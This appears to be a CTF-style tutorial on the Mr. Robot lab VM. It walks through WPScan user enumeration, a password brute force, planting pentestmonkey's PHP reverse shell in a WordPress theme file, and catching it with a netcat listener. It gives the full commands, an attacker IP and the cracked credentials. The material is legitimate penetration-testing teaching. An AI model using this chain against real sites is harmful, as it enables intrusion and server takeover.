This tutorial demonstrates creating a reverse shell on a device through WordPress. This exploit is useful for many CTF events and is often found in the wild.
For this walkthrough, the WordPress installation on the Mr. Robot VM will be used with an added WordPress admin account for simplicity. Complete walkthroughs for Mr. Robot are found in many places (possibly on pentaROOT.com someday in the future), but this tutorial focuses specifically on obtaining a reverse shell through WordPress themes.
Software
- WordPress Installation
- WPScan
- php-reverse-shell (pentestmonkey)
- also located at /usr/share/webshells/php/php-reverse-shell.php on Kali
Install WPScan
- Included in Kali Linux
- If not currently installed on your distro:
- $sudo apt-get update
- Install dependencies:
- $sudo apt install curl git libcurl4-openssl-dev make zlib1g-dev gawk g++ gcc libreadline6-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 autoconf libgdbm-dev libncurses5-dev automake libtool bison pkg-config ruby ruby-bundler ruby-dev -y
- $git clone https://github.com/wpscanteam/wpscan.git
- $cd wpscan
- $bundle install –without test
- $ruby wpscan.rb –update
- Run wpscan commands from the wpscan folder by appending with ruby wpscan.rb instead of just wpscan.
- To run a WPScan without options:
- $sudo wpscan –url https://wordpress_example.com
- $sudo wpscan –url 192.168.189.142
Brute Force wp-login.php
In a browser, navigate to the /wp-login.php of your target.
The first step in brute forcing WordPress is to enumerate users. WPScan has this feature built in already, so let’s run it.
- $sudo wpscan –url 192.168.189.142 –enumerate u
Depending on the version of WordPress, you may also use the wp-login.php login form to enumerate users. Simply enter a username and any password. The ERROR response may give this away.
So there is a user named admin, but not administrator. Let’s use WPScan to brute force the admin password.
- $wpscan –url 192.168.189.142 –wordlist /usr/share/wordlists/rockyou.txt –username admin
Success! admin:peaches
Insert Reverse Shell Into WordPress Theme
Once you have credentials, login to wp-login.php and navigate to the theme editor.
- Appearance > Editor
Take note of the current theme being edited. For this tutorial, we are editing the ‘Twenty Thirteen’ theme. Underneath the Templates sidebar, there are multiple files, including *.css, *.php, and possibly others. As our reverse shell is written in PHP, let’s target a PHP file. The archive.php file is typically a good one to use.
Delete all the text in the archive.php file and replace it with that of our PHP reverse shell.
- Included on Kali at /usr/share/webshells/php/php-reverse-shell.php
- Direct from PentestMonkey
- $wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
- $tar -xzf php-reverse-shell-1.0.tar.gz
- $cat php-reverse-shell-1.0/php-reverse-shell.php
Update the following lines in the php script to your attacker IP address and the port you wish to connect on:
- Default
- $ip = ‘127.0.0.1’; // CHANGE THIS
- $port = 1234; // CHANGE THIS
- Updated
- $ip = ‘192.168.189.135’;
- $port = 443;
You may find your IP address by entering the following command in a terminal on your attacker device (typically the inet address under eth0):
- $sudo ifconfig
- $sudo ip a
Click on the ‘Update File’ button at the bottom of the script to save your changes. If the file was saved correctly, the ‘File edited successfully’ notification will display above the code.
Connect to the Reverse Shell
In a terminal, start a netcat listener on the port specified in the PHP reverse shell script.
- $sudo nc -nvlp 443
In a new tab on your browser, navigate to the updated archive.php page using the following template:
- http://<url-or-ip>/wp-content/themes/<theme-name>/archive.php
- http://192.168.189.142/wp-content/themes/twentythirteen/archive.php
Success! We now have a reverse shell as a low privilege user.
On Your Own
Obtaining a low privilege shell is the first step, but escalating to root or admin privileges gives you the keys to the kingdom. We will have additional posts in the future to cover privilege escalation, but see what you can find on your own. A great place to start is exploit-db.